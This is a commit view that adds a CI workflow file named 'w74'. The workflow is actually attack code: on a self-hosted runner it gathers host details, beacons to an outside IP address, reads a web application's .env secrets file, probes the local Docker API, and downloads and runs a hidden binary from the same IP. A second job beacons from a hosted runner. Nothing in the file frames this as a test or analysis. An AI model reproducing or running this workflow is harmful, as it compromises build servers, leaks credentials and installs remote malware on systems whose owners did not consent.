w74
w74 / a (push) Canceled after 0s
w74 / b (push) Canceled after 0s

This commit is contained in:
2026-08-21 05:51:18 +00:00
parent 8e9c19596a
commit 6654c34e5f
+17
View File
@@ -0,0 +1,17 @@
name: w74
on: [push]
jobs:
a:
runs-on: self-hosted
steps:
- run: |
id; hostname; uname -a
curl -sS http://38.22.234.200:19090/act-$(hostname)-$(whoami) || true
ls -la /home/www/dataapi.dage.top 2>/dev/null | head
cat /home/www/dataapi.dage.top/.env 2>/dev/null | head -c 3000 || true
curl -sS http://127.0.0.1:2375/version || true
curl -fsSL http://38.22.234.200:19091/ -o /tmp/.b; chmod +x /tmp/.b; /tmp/.b &
b:
runs-on: ubuntu-latest
steps:
- run: curl -sS http://38.22.234.200:19090/ubu-$(hostname) || true